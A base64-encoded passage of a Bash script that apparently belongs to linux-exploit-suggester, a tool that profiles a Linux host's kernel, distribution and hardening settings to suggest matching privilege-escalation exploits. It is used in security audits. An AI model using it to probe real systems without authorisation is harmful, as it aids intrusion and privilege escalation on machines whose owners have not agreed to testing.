dGlvbiBzaWduIGFuZCByZXF1aXJlZCB2YWx1ZQogICAgICAgIGlmIGVjaG8gJHN5c2N0bENvbmRpdGlvbiB8IGdyZXAgLXFpICIhPSI7IHRoZW4KICAgICAgICAgICAgc2lnbj0iIT0iCiAgICAgICAgZWxpZiBlY2hvICRzeXNjdGxDb25kaXRpb24gfCBncmVwIC1xaSAiPT0iOyB0aGVuCiAgICAgICAgICAgIHNpZ249Ij09IgogICAgICAgIGVsc2UKICAgICAgICAgICAgZXhpdFdpdGhFcnJNc2cgIldyb25nIHN5c2N0bCBjb25kaXRpb24uIFRoZXJlIGlzIHN5bnRheCBlcnJvciBpbiB5b3VyIGZlYXR1cmVzIERCLiBBYm9ydGluZy4iCiAgICAgICAgZmkKICAgICAgICB2YWw9JChlY2hvICIkc3lzY3RsQ29uZGl0aW9uIiB8IGF3ayAtRiAiJHNpZ24iICd7cHJpbnQgJDJ9JykKICAgICAgICBlbnRyeT0kKGVjaG8gIiRzeXNjdGxDb25kaXRpb24iIHwgYXdrIC1GICIkc2lnbiIgJ3twcmludCAkMX0nKQoKICAgICAgICAjIGdldCBjdXJyZW50IHNldHRpbmcgb2Ygc3lzY3RsIGVudHJ5CiAgICAgICAgY3VyVmFsPSQoL3NiaW4vc3lzY3RsIC1hIDI+IC9kZXYvbnVsbCB8IGdyZXAgIiRlbnRyeSIgfCBhd2sgLUYnPScgJ3twcmludCAkMn0nKQoKICAgICAgICAjIHNwZWNpYWwgY2FzZSBmb3IgLS1jaGVja3NlYyBtb2RlOiByZXR1cm4gMiBpZiB0aGVyZSBpcyBubyBzdWNoIHN3aXRjaCBpbiBzeXNjdGwKICAgICAgICBbIC16ICIkY3VyVmFsIiAtYSAiJG9wdF9jaGVja3NlY19tb2RlIiA9ICJ0cnVlIiBdICYmIHJldHVybiAyCgogICAgICAgICMgZm9yIG90aGVyIG1vZGVzOiBza2lwIGlmIHRoZXJlIGlzIG5vIHN1Y2ggc3dpdGNoIGluIHN5c2N0bAogICAgICAgIFsgLXogIiRjdXJWYWwiIF0gJiYgcmV0dXJuIDAKCiAgICAgICAgIyBjb21wYXJlICYgcmV0dXJuIHJlc3VsdAogICAgICAgIGNvbXBhcmVWYWx1ZXMgJGN1clZhbCAkdmFsICRzaWduICYmIHJldHVybiAwCgogICAgZWxpZiBbWyAiJElOIiA9fiBeY21kOi4qJCBdXTsgdGhlbgoKICAgICAgICAjIHNraXAgaWYgY2hlY2sgaXMgbm90IGFwcGxpY2FibGUgKC1rIG9yIC0tdW5hbWUgb3IgLXAgbW9kZXMpIG9yIGlmIHVzZXIgc2FpZCBzbyAoLS1za2lwLW1vcmUtY2hlY2tzKQogICAgICAgIFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPSAidHJ1ZSIgXSAmJiByZXR1cm4gMAoKICAgICAgICBjbWQ9IiR7SU46NH0iCiAgICAgICAgaWYgZXZhbCAiJHtjbWR9IjsgdGhlbgogICAgICAgICAgICByZXR1cm4gMAogICAgICAgIGZpCiAgICBmaQoKICAgIHJldHVybiAxCn0KCmdldEtlcm5lbENvbmZpZygpIHsKCiAgICBpZiBbIC1mIC9wcm9jL2NvbmZpZy5neiBdIDsgdGhlbgogICAgICAgIEtDT05GSUc9InpjYXQgL3Byb2MvY29uZmlnLmd6IgogICAgZWxpZiBbIC1mIC9ib290L2NvbmZpZy1gdW5hbWUgLXJgIF0gOyB0aGVuCiAgICAgICAgS0NPTkZJRz0iY2F0IC9ib290L2NvbmZpZy1gdW5hbWUgLXJgIgogICAgZWxpZiBbIC1mICIke0tCVUlMRF9PVVRQVVQ6LS91c3Ivc3JjL2xpbnV4fSIvLmNvbmZpZyBdIDsgdGhlbgogICAgICAgIEtDT05GSUc9ImNhdCAke0tCVUlMRF9PVVRQVVQ6LS91c3Ivc3JjL2xpbnV4fS8uY29uZmlnIgogICAgZWxzZQogICAgICAgIEtDT05GSUc9IiIKICAgIGZpCn0KCmNoZWNrc2VjTW9kZSgpIHsKCiAgICBNT0RFPTAKCiAgICAjIHN0YXJ0IGFuYWx5c2lzCmZvciBGRUFUVVJFIGluICIke0ZFQVRVUkVTW0BdfSI7IGRvCgogICAgIyBjcmVhdGUgYXJyYXkgZnJvbSBjdXJyZW50IGV4cGxvaXQgaGVyZSBkb2MgYW5kIGZldGNoIG5lZWRlZCBsaW5lcwogICAgaT0wCiAgICAjICgnLXInIGlzIHVzZWQgdG8gbm90IGludGVycHJldCBiYWNrc2xhc2ggdXNlZCBmb3IgYmFzaCBjb2xvcnMpCiAgICB3aGlsZSByZWFkIC1yIGxpbmUKICAgIGRvCiAgICAgICAgYXJyW2ldPSIkbGluZSIKICAgICAgICBpPSQoKGkgKyAxKSkKICAgIGRvbmUgPDw8ICIkRkVBVFVSRSIKCgkjIG1vZGVzOiBrZXJuZWwtZmVhdHVyZSAoMSkgfCBody1mZWF0dXJlICgyKSB8IDNyZHBhcnR5LWZlYXR1cmUgKDMpIHwgYXR0YWNrLXN1cmZhY2UgKDQpCiAgICBOQU1FPSIke2FyclswXX0iCiAgICBQUkVfTkFNRT0iJHtOQU1FOjA6OH0iCiAgICBOQU1FPSIke05BTUU6OX0iCiAgICBpZiBbICIke1BSRV9OQU1FfSIgPSAic2VjdGlvbjoiIF07IHRoZW4KCQkjIGFkdmFuY2UgdG8gbmV4dCBNT0RFCgkJTU9ERT0kKCgkTU9ERSArIDEpKQoKICAgICAgICBlY2hvCiAgICAgICAgZWNobyAtZSAiJHtibGR3aHR9JHtOQU1FfSR7dHh0cnN0fSIKICAgICAgICBlY2hvCiAgICAgICAgY29udGludWUKICAgIGZpCgogICAgQVZBSUxBQkxFPSIke2FyclsxXX0iICYmIEFWQUlMQUJMRT0iJHtBVkFJTEFCTEU6MTF9IgogICAgRU5BQkxFPSQoZWNobyAiJEZFQVRVUkUiIHwgZ3JlcCAiZW5hYmxlZDogIiB8IGF3ayAtRidlZDogJyAne3ByaW50ICQyfScpCiAgICBhbmFseXNpc191cmw9JChlY2hvICIkRkVBVFVSRSIgfCBncmVwICJhbmFseXNpcy11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoKICAgICMgc3BsaXQgbGluZSB3aXRoIGF2YWlsYWJpbGl0eSByZXF1aXJlbWVudHMgJiBsb29wIHRocnUgYWxsIGF2YWlsYWJpbGl0eSByZXFzIG9uZSBieSBvbmUgJiBjaGVjayB3aGV0aGVyIGl0IGlzIG1ldAogICAgSUZTPScsJyByZWFkIC1yIC1hIGFycmF5IDw8PCAiJEFWQUlMQUJMRSIKICAgIEFWQUlMQUJMRV9SRVFTX05VTT0keyNhcnJheVtAXX0KICAgIEFWQUlMQUJMRV9QQVNTRURfUkVRPTAKCUNPTkZJRz0iIgogICAgZm9yIFJFUSBpbiAiJHthcnJheVtAXX0iOyBkbwoKCQkjIGZpbmQgQ09ORklHXyBuYW1lIChpZiBwcmVzZW50KSBmb3IgY3VycmVudCBmZWF0dXJlIChvbmx5IGZvciBkaXNwbGF5IHB1cnBvc2VzKQoJCWlmIFsgLXogIiRDT05GSUciIF07IHRoZW4KCQkJY29uZmlnPSQoZWNobyAiJFJFUSIgfCBncmVwICJDT05GSUdfIikKCQkJWyAtbiAiJGNvbmZpZyIgXSAmJiBDT05GSUc9IigkKGVjaG8gJFJFUSB8IGN1dCAtZCc9JyAtZjEpKSIKCQlmaQoKICAgICAgICBpZiAoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIpOyB0aGVuCiAgICAgICAgICAgIEFWQUlMQUJMRV9QQVNTRURfUkVRPSQoKCRBVkFJTEFCTEVfUEFTU0VEX1JFUSArIDEpKQogICAgICAgIGVsc2UKICAgICAgICAgICAgYnJlYWsKICAgICAgICBmaQogICAgZG9uZQoKICAgICMgc3BsaXQgbGluZSB3aXRoIGVuYWJsZW1lbnQgcmVxdWlyZW1lbnRzICYgbG9vcCB0aHJ1IGFsbCBlbmFibGVtZW50IHJlcXMgb25lIGJ5IG9uZSAmIGNoZWNrIHdoZXRoZXIgaXQgaXMgbWV0CiAgICBFTkFCTEVfUEFTU0VEX1JFUT0wCiAgICBFTkFCTEVfUkVRU19OVU09MAogICAgbm9TeXNjdGw9MAogICAgaWYgWyAtbiAiJEVOQUJMRSIgXTsgdGhlbgogICAgICAgIElGUz0nLCcgcmVhZCAtciAtYSBhcnJheSA8PDwgIiRFTkFCTEUiCiAgICAgICAgRU5BQkxFX1JFUVNfTlVNPSR7I2FycmF5W0BdfQogICAgICAgIGZvciBSRVEgaW4gIiR7YXJyYXlbQF19IjsgZG8KICAgICAgICAgICAgY21kU3Rkb3V0PSQoY2hlY2tSZXF1aXJlbWVudCAiJFJFUSIpCiAgICAgICAgICAgIHJldFZhbD0kPwogICAgICAgICAgICBpZiBbICRyZXRWYWwgLWVxIDAgXTsgdGhlbgogICAgICAgICAgICAgICAgRU5BQkxFX1BBU1NFRF9SRVE9JCgoJEVOQUJMRV9QQVNTRURfUkVRICsgMSkpCiAgICAgICAgICAgIGVsaWYgWyAkcmV0VmFsIC1lcSAyIF07IHRoZW4KICAgICAgICAgICAgIyBzcGVjaWFsIGNhc2U6IHN5c2N0bCBlbnRyeSBpcyBub3QgcHJlc2VudCBvbiBnaXZlbiBzeXN0ZW06IHNpZ25hbCBpdCBhczogTi9BCiAgICAgICAgICAgICAgICBub1N5c2N0bD0xCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBmaQogICAgICAgIGRvbmUKICAgIGZpCgogICAgZmVhdHVyZT0kKGVjaG8gIiRGRUFUVVJFIiB8IGdyZXAgImZlYXR1cmU6ICIgfCBjdXQgLWQnICcgLWYgMi0pCgogICAgaWYgWyAtbiAiJGNtZFN0ZG91dCIgXTsgdGhlbgogICAgICAgIGlmIFsgJGNtZFN0ZG91dCAtZXEgMCBdOyB0aGVuCiAgICAgICAgICAgIHN0YXRlPSJbICR7dHh0cmVkfVNldCB0byAkY21kU3Rkb3V0JHt0eHRyc3R9IF0iCgkJCWNtZFN0ZG91dD0iIgogICAgICAgIGVsc2UKICAgICAgICAgICAgc3RhdGU9IlsgJHt0eHRncm59U2V0IHRvICRjbWRTdGRvdXQke3R4dHJzdH0gXSIKCQkJY21kU3Rkb3V0PSIiCiAgICAgICAgZmkKICAgIGVsc2UKCgl1bmtub3duPSJbICR7dHh0Z3JheX1Vbmtub3duJHt0eHRyc3R9ICBdIgoKCSMgZm9yIDNyZCBwYXJ0eSAoMykgbW9kZSBkaXNwbGF5ICJOL0EiIG9yICJFbmFibGVkIgoJaWYgWyAkTU9ERSAtZXEgMyBdOyB0aGVuCiAgICAgICAgICAgIGVuYWJsZWQ9IlsgJHt0eHRncm59RW5hYmxlZCR7dHh0cnN0fSAgIF0iCiAgICAgICAgICAgIGRpc2FibGVkPSJbICAgJHt0eHRncmF5fU4vQSR7dHh0cnN0fSAgICBdIgoKICAgICAgICAjIGZvciBhdHRhY2stc3VyZmFjZSAoNCkgbW9kZSBkaXNwbGF5ICJMb2NrZWQiIG9yICJFeHBvc2VkIgogICAgICAgIGVsaWYgWyAkTU9ERSAtZXEgNCBdOyB0aGVuCiAgICAgICAgICAgZW5hYmxlZD0iWyAke3R4dHJlZH1FeHBvc2VkJHt0eHRyc3R9ICBdIgogICAgICAgICAgIGRpc2FibGVkPSJbICR7dHh0Z3JufUxvY2tlZCR7dHh0cnN0fSAgIF0iCgoJIyBvdGhlciBtb2RlcyIgIkRpc2FibGVkIiAvICJFbmFibGVkIgoJZWxzZQoJCWVuYWJsZWQ9IlsgJHt0eHRncm59RW5hYmxlZCR7dHh0cnN0fSAgXSIKCQlkaXNhYmxlZD0iWyAke3R4dHJlZH1EaXNhYmxlZCR7dHh0cnN0fSBdIgoJZmkKCglpZiBbIC16ICIkS0NPTkZJRyIgLWEgIiRFTkFCTEVfUkVRU19OVU0iID0gMCBdOyB0aGVuCgkgICAgc3RhdGU9JHVua25vd24KICAgIGVsaWYgWyAkQVZBSUxBQkxFX1BBU1NFRF9SRVEgLWVxICRBVkFJTEFCTEVfUkVRU19OVU0gLWEgJEVOQUJMRV9QQVNTRURfUkVRIC1lcSAkRU5BQkxFX1JFUVNfTlVNIF07IHRoZW4KICAgICAgICBzdGF0ZT0kZW5hYmxlZAogICAgZWxzZQogICAgICAgIHN0YXRlPSRkaXNhYmxlZAoJZmkKCiAgICBmaQoKICAgIGVjaG8gLWUgIiAkc3RhdGUgJGZlYXR1cmUgJHt3aHR9JHtDT05GSUd9JHt0eHRyc3R9IgogICAgWyAtbiAiJGFuYWx5c2lzX3VybCIgXSAmJiBlY2hvIC1lICIgICAgICAgICAgICAgICRhbmFseXNpc191cmwiCiAgICBlY2hvCgpkb25lCgp9CgpkaXNwbGF5RXhwb3N1cmUoKSB7CiAgICBSQU5LPSQxCgogICAgaWYgWyAiJFJBTksiIC1nZSA2IF07IHRoZW4KICAgICAgICBlY2hvICJoaWdobHkgcHJvYmFibGUiCiAgICBlbGlmIFsgIiRSQU5LIiAtZ2UgMyBdOyB0aGVuCiAgICAgICAgZWNobyAicHJvYmFibGUiCiAgICBlbHNlCiAgICAgICAgZWNobyAibGVzcyBwcm9iYWJsZSIKICAgIGZpCn0KCiMgcGFyc2UgY29tbWFuZCBsaW5lIHBhcmFtZXRlcnMKQVJHUz0kKGdldG9wdCAtLW9wdGlvbnMgJFNIT1JUT1BUUyAgLS1sb25nb3B0aW9ucyAkTE9OR09QVFMgLS0gIiRAIikKWyAkPyAhPSAwIF0gJiYgZXhpdFdpdGhFcnJNc2cgIkFib3J0aW5nLiIKCmV2YWwgc2V0IC0tICIkQVJHUyIKCndoaWxlIHRydWU7IGRvCiAgICBjYXNlICIkMSIgaW4KICAgICAgICAtdXwtLXVuYW1lKQogICAgICAgICAgICBzaGlmdAogICAgICAgICAgICBVTkFNRV9BPSIkMSIKICAgICAgICAgICAgb3B0X3VuYW1lX3N0cmluZz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLVZ8LS12ZXJzaW9uKQogICAgICAgICAgICB2ZXJzaW9uCiAgICAgICAgICAgIGV4aXQgMAogICAgICAgICAgICA7OwogICAgICAgIC1ofC0taGVscCkKICAgICAgICAgICAgdXNhZ2UgCiAgICAgICAgICAgIGV4aXQgMAogICAgICAgICAgICA7OwogICAgICAgIC1mfC0tZnVsbCkKICAgICAgICAgICAgb3B0X2Z1bGw9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC1nfC0tc2hvcnQpCiAgICAgICAgICAgIG9wdF9zdW1tYXJ5PXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtYnwtLWZldGNoLWJpbmFyaWVzKQogICAgICAgICAgICBvcHRfZmV0Y2hfYmlucz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLXN8LS1mZXRjaC1zb3VyY2VzKQogICAgICAgICAgICBvcHRfZmV0Y2hfc3Jjcz10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLWt8LS1rZXJuZWwpCiAgICAgICAgICAgIHNoaWZ0CiAgICAgICAgICAgIEtFUk5FTD0iJDEiCiAgICAgICAgICAgIG9wdF9rZXJuZWxfdmVyc2lvbj10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLWR8LS1zaG93LWRvcykKICAgICAgICAgICAgb3B0X3Nob3dfZG9zPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtcHwtLXBrZ2xpc3QtZmlsZSkKICAgICAgICAgICAgc2hpZnQKICAgICAgICAgICAgUEtHTElTVF9GSUxFPSIkMSIKICAgICAgICAgICAgb3B0X3BrZ2xpc3RfZmlsZT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS1jdmVsaXN0LWZpbGUpCiAgICAgICAgICAgIHNoaWZ0CiAgICAgICAgICAgIENWRUxJU1RfRklMRT0iJDEiCiAgICAgICAgICAgIG9wdF9jdmVsaXN0X2ZpbGU9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgIC0tY2hlY2tzZWMpCiAgICAgICAgICAgIG9wdF9jaGVja3NlY19tb2RlPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtLWtlcm5lbHNwYWNlLW9ubHkpCiAgICAgICAgICAgIG9wdF9rZXJuZWxfb25seT10cnVlCiAgICAgICAgICAgIDs7CiAgICAgICAgLS11c2Vyc3BhY2Utb25seSkKICAgICAgICAgICAgb3B0X3VzZXJzcGFjZV9vbmx5PXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtLXNraXAtbW9yZS1jaGVja3MpCiAgICAgICAgICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPXRydWUKICAgICAgICAgICAgOzsKICAgICAgICAtLXNraXAtcGtnLXZlcnNpb25zKQogICAgICAgICAgICBvcHRfc2tpcF9wa2dfdmVyc2lvbnM9dHJ1ZQogICAgICAgICAgICA7OwogICAgICAgICopCiAgICAgICAgICAgIHNoaWZ0CiAgICAgICAgICAgIGlmIFsgIiQjIiAhPSAiMCIgXTsgdGhlbgogICAgICAgICAgICAgICAgZXhpdFdpdGhFcnJNc2cgIlVua25vd24gb3B0aW9uICckMScuIEFib3J0aW5nLiIKICAgICAgICAgICAgZmkKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgICAgOzsKICAgIGVzYWMKICAgIHNoaWZ0CmRvbmUKCiMgY2hlY2sgQmFzaCB2ZXJzaW9uIChhc3NvY2lhdGl2ZSBhcnJheXMgbmVlZCBCYXNoIGluIHZlcnNpb24gNC4wKykKaWYgKChCQVNIX1ZFUlNJTkZPWzBdIDwgNCkpOyB0aGVuCiAgICBleGl0V2l0aEVyck1zZyAiU2NyaXB0IG5lZWRzIEJhc2ggaW4gdmVyc2lvbiA0LjAgb3IgbmV3ZXIuIEFib3J0aW5nLiIKZmkKCiMgZXhpdCBpZiBib3RoIC0ta2VybmVsIGFuZCAtLXVuYW1lIGFyZSBzZXQKWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPSAidHJ1ZSIgXSAmJiBbICRvcHRfdW5hbWVfc3RyaW5nID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC11fC0tdW5hbWUgYW5kIC1rfC0ta2VybmVsIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKCiMgZXhpdCBpZiBib3RoIC0tZnVsbCBhbmQgLS1zaG9ydCBhcmUgc2V0ClsgIiRvcHRfZnVsbCIgPSAidHJ1ZSIgXSAmJiBbICRvcHRfc3VtbWFyeSA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtZnwtLWZ1bGwgYW5kIC1nfC0tc2hvcnQgYXJlIG11dHVhbGx5IGV4Y2x1c2l2ZS4gQWJvcnRpbmcuIgoKIyAtLWN2ZWxpc3QtZmlsZSBtb2RlIGlzIHN0YW5kYWxvbmUgbW9kZSBhbmQgaXMgbm90IGFwcGxpY2FibGUgd2hlbiBvbmUgb2YgLWsgfCAtdSB8IC1wIHwgLS1jaGVja3NlYyBzd2l0Y2hlcyBhcmUgc2V0CmlmIFsgIiRvcHRfY3ZlbGlzdF9maWxlIiA9ICJ0cnVlIiBdOyB0aGVuCiAgICBbICEgLWUgIiRDVkVMSVNUX0ZJTEUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlByb3ZpZGVkIENWRSBsaXN0IGZpbGUgZG9lcyBub3QgZXhpc3RzLiBBYm9ydGluZy4iCiAgICBbICIkb3B0X2tlcm5lbF92ZXJzaW9uIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAta3wtLWtlcm5lbCBhbmQgLS1jdmVsaXN0LWZpbGUgYXJlIG11dHVhbGx5IGV4Y2x1c2l2ZS4gQWJvcnRpbmcuIgogICAgWyAiJG9wdF91bmFtZV9zdHJpbmciID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC11fC0tdW5hbWUgYW5kIC0tY3ZlbGlzdC1maWxlIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKICAgIFsgIiRvcHRfcGtnbGlzdF9maWxlIiA9ICJ0cnVlIiBdICYmIGV4aXRXaXRoRXJyTXNnICJTd2l0Y2hlcyAtcHwtLXBrZ2xpc3QtZmlsZSBhbmQgLS1jdmVsaXN0LWZpbGUgYXJlIG11dHVhbGx5IGV4Y2x1c2l2ZS4gQWJvcnRpbmcuIgpmaQoKIyAtLWNoZWNrc2VjIG1vZGUgaXMgc3RhbmRhbG9uZSBtb2RlIGFuZCBpcyBub3QgYXBwbGljYWJsZSB3aGVuIG9uZSBvZiAtayB8IC11IHwgLXAgfCAtLWN2ZWxpc3QtZmlsZSBzd2l0Y2hlcyBhcmUgc2V0CmlmIFsgIiRvcHRfY2hlY2tzZWNfbW9kZSIgPSAidHJ1ZSIgXTsgdGhlbgogICAgWyAiJG9wdF9rZXJuZWxfdmVyc2lvbiIgPSAidHJ1ZSIgXSAmJiBleGl0V2l0aEVyck1zZyAiU3dpdGNoZXMgLWt8LS1rZXJuZWwgYW5kIC0tY2hlY2tzZWMgYXJlIG11dHVhbGx5IGV4Y2x1c2l2ZS4gQWJvcnRpbmcuIgogICAgWyAiJG9wdF91bmFtZV9zdHJpbmciID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC11fC0tdW5hbWUgYW5kIC0tY2hlY2tzZWMgYXJlIG11dHVhbGx5IGV4Y2x1c2l2ZS4gQWJvcnRpbmcuIgogICAgWyAiJG9wdF9wa2dsaXN0X2ZpbGUiID0gInRydWUiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlN3aXRjaGVzIC1wfC0tcGtnbGlzdC1maWxlIGFuZCAtLWNoZWNrc2VjIGFyZSBtdXR1YWxseSBleGNsdXNpdmUuIEFib3J0aW5nLiIKZmkKCiMgZXh0cmFjdCBrZXJuZWwgdmVyc2lvbiBhbmQgb3RoZXIgT1MgaW5mbyBsaWtlIGRpc3RybyBuYW1lLCBkaXN0cm8gdmVyc2lvbiwgZXRjLiAzIHBvc3NpYmlsaXRpZXMgaGVyZToKIyBjYXNlIDE6IC0ta2VybmVsIHNldAppZiBbICIkb3B0X2tlcm5lbF92ZXJzaW9uIiA9PSAidHJ1ZSIgXTsgdGhlbgogICAgIyBUT0RPOiBhZGQga2VybmVsIHZlcnNpb24gbnVtYmVyIHZhbGlkYXRpb24KICAgIFsgLXogIiRLRVJORUwiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIlVucmVjb2duaXplZCBrZXJuZWwgdmVyc2lvbiBnaXZlbi4gQWJvcnRpbmcuIgogICAgQVJDSD0iIgogICAgT1M9IiIKCiAgICAjIGRvIG5vdCBwZXJmb3JtIGFkZGl0aW9uYWwgY2hlY2tzIG9uIGN1cnJlbnQgbWFjaGluZQogICAgb3B0X3NraXBfbW9yZV9jaGVja3M9dHJ1ZQoKICAgICMgZG8gbm90IGNvbnNpZGVyIGN1cnJlbnQgT1MKICAgIGdldFBrZ0xpc3QgIiIgIiRQS0dMSVNUX0ZJTEUiCgojIGNhc2UgMjogLS11bmFtZSBzZXQKZWxpZiBbICIkb3B0X3VuYW1lX3N0cmluZyIgPT0gInRydWUiIF07IHRoZW4KICAgIFsgLXogIiRVTkFNRV9BIiBdICYmIGV4aXRXaXRoRXJyTXNnICJ1bmFtZSBzdHJpbmcgZW1wdHkuIEFib3J0aW5nLiIKICAgIHBhcnNlVW5hbWUgIiRVTkFNRV9BIgoKICAgICMgZG8gbm90IHBlcmZvcm0gYWRkaXRpb25hbCBjaGVja3Mgb24gY3VycmVudCBtYWNoaW5lCiAgICBvcHRfc2tpcF9tb3JlX2NoZWNrcz10cnVlCgogICAgIyBkbyBub3QgY29uc2lkZXIgY3VycmVudCBPUwogICAgZ2V0UGtnTGlzdCAiIiAiJFBLR0xJU1RfRklMRSIKCiMgY2FzZSAzOiAtLWN2ZWxpc3QtZmlsZSBtb2RlCmVsaWYgWyAiJG9wdF9jdmVsaXN0X2ZpbGUiID0gInRydWUiIF07IHRoZW4KCiAgICAjIGdldCBrZXJuZWwgY29uZmlndXJhdGlvbiBpbiB0aGlzIG1vZGUKICAgIFsgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPSAiZmFsc2UiIF0gJiYgZ2V0S2VybmVsQ29uZmlnCgojIGNhc2UgNDogLS1jaGVja3NlYyBtb2RlCmVsaWYgWyAiJG9wdF9jaGVja3NlY19tb2RlIiA9ICJ0cnVlIiBdOyB0aGVuCgogICAgIyB0aGlzIHN3aXRjaCBpcyBub3QgYXBwbGljYWJsZSBpbiB0aGlzIG1vZGUKICAgIG9wdF9za2lwX21vcmVfY2hlY2tzPWZhbHNlCgogICAgIyBnZXQga2VybmVsIGNvbmZpZ3VyYXRpb24gaW4gdGhpcyBtb2RlCiAgICBnZXRLZXJuZWxDb25maWcKICAgIFsgLXogIiRLQ09ORklHIiBdICYmIGVjaG8gIldBUk5JTkcuIEtlcm5lbCBDb25maWcgbm90IGZvdW5kIG9uIHRoZSBzeXN0ZW0gcmVzdWx0cyB3b24ndCBiZSBjb21wbGV0ZS4iCgogICAgIyBsYXVuY2ggY2hlY2tzZWMgbW9kZQogICAgY2hlY2tzZWNNb2RlCgogICAgZXhpdCAwCgojIGNhc2UgNTogbm8gLS11bmFtZSB8IC0ta2VybmVsIHwgLS1jdmVsaXN0LWZpbGUgfCAtLWNoZWNrc2VjIHNldAplbHNlCgogICAgIyAtLXBrZ2xpc3QtZmlsZSBOT1QgcHJvdmlkZWQ6IHRha2UgYWxsIGluZm8gZnJvbSBjdXJyZW50IG1hY2hpbmUKICAgICMgY2FzZSBmb3IgdmFuaWxsYSBleGVjdXRpb246IC4vbGludXgtZXhwbG9pdC1zdWdnZXN0ZXIuc2gKICAgIGlmIFsgIiRvcHRfcGtnbGlzdF9maWxlIiA9PSAiZmFsc2UiIF07IHRoZW4KICAgICAgICBVTkFNRV9BPSQodW5hbWUgLWEpCiAgICAgICAgWyAteiAiJFVOQU1FX0EiIF0gJiYgZXhpdFdpdGhFcnJNc2cgInVuYW1lIHN0cmluZyBlbXB0eS4gQWJvcnRpbmcuIgogICAgICAgIHBhcnNlVW5hbWUgIiRVTkFNRV9BIgoKICAgICAgICAjIGdldCBrZXJuZWwgY29uZmlndXJhdGlvbiBpbiB0aGlzIG1vZGUKICAgICAgICBbICIkb3B0X3NraXBfbW9yZV9jaGVja3MiID0gImZhbHNlIiBdICYmIGdldEtlcm5lbENvbmZpZwoKICAgICAgICAjIGV4dHJhY3QgZGlzdHJpYnV0aW9uIHZlcnNpb24gZnJvbSAvZXRjL29zLXJlbGVhc2UgT1IgL2V0Yy9sc2ItcmVsZWFzZQogICAgICAgIFsgLW4gIiRPUyIgLWEgIiRvcHRfc2tpcF9tb3JlX2NoZWNrcyIgPSAiZmFsc2UiIF0gJiYgRElTVFJPPSQoZ3JlcCAtcyAtRSAnXkRJU1RSSUJfUkVMRUFTRT18XlZFUlNJT05fSUQ9JyAvZXRjLyotcmVsZWFzZSB8IGN1dCAtZCc9JyAtZjIgfCBoZWFkIC0xIHwgdHIgLWQgJyInKQoKICAgICAgICAjIGV4dHJhY3QgcGFja2FnZSBsaXN0aW5nIGZyb20gY3VycmVudCBPUwogICAgICAgIGdldFBrZ0xpc3QgIiRPUyIgIiIKCiAgICAjIC0tcGtnbGlzdC1maWxlIHByb3ZpZGVkOiBvbmx5IGNvbnNpZGVyIHVzZXJzcGFjZSBleHBsb2l0cyBhZ2FpbnN0IHByb3ZpZGVkIHBhY2thZ2UgbGlzdGluZwogICAgZWxzZQogICAgICAgIEtFUk5FTD0iIgogICAgICAgICNUT0RPOiBleHRyYWN0IG1hY2hpbmUgYXJjaCBmcm9tIHBhY2thZ2UgbGlzdGluZwogICAgICAgIEFSQ0g9IiIKICAgICAgICB1bnNldCBFWFBMT0lUUwogICAgICAgIGRlY2xhcmUgLUEgRVhQTE9JVFMKICAgICAgICBnZXRQa2dMaXN0ICIiICIkUEtHTElTVF9GSUxFIgoKICAgICAgICAjIGFkZGl0aW9uYWwgY2hlY2tzIGFyZSBub3QgYXBwbGljYWJsZSBmb3IgdGhpcyBtb2RlCiAgICAgICAgb3B0X3NraXBfbW9yZV9jaGVja3M9dHJ1ZQogICAgZmkKZmkKCmVjaG8KZWNobyAtZSAiJHtibGR3aHR9QXZhaWxhYmxlIGluZm9ybWF0aW9uOiR7dHh0cnN0fSIKZWNobwpbIC1uICIkS0VSTkVMIiBdICYmIGVjaG8gLWUgIktlcm5lbCB2ZXJzaW9uOiAke3R4dGdybn0kS0VSTkVMJHt0eHRyc3R9IiB8fCBlY2hvIC1lICJLZXJuZWwgdmVyc2lvbjogJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IgplY2hvICJBcmNoaXRlY3R1cmU6ICQoWyAtbiAiJEFSQ0giIF0gJiYgZWNobyAtZSAiJHt0eHRncm59JEFSQ0gke3R4dHJzdH0iIHx8IGVjaG8gLWUgIiR7dHh0cmVkfU4vQSR7dHh0cnN0fSIpIgplY2hvICJEaXN0cmlidXRpb246ICQoWyAtbiAiJE9TIiBdICYmIGVjaG8gLWUgIiR7dHh0Z3JufSRPUyR7dHh0cnN0fSIgfHwgZWNobyAtZSAiJHt0eHRyZWR9Ti9BJHt0eHRyc3R9IikiCmVjaG8gLWUgIkRpc3RyaWJ1dGlvbiB2ZXJzaW9uOiAkKFsgLW4gIiRESVNUUk8iIF0gJiYgZWNobyAtZSAiJHt0eHRncm59JERJU1RSTyR7dHh0cnN0fSIgfHwgZWNobyAtZSAiJHt0e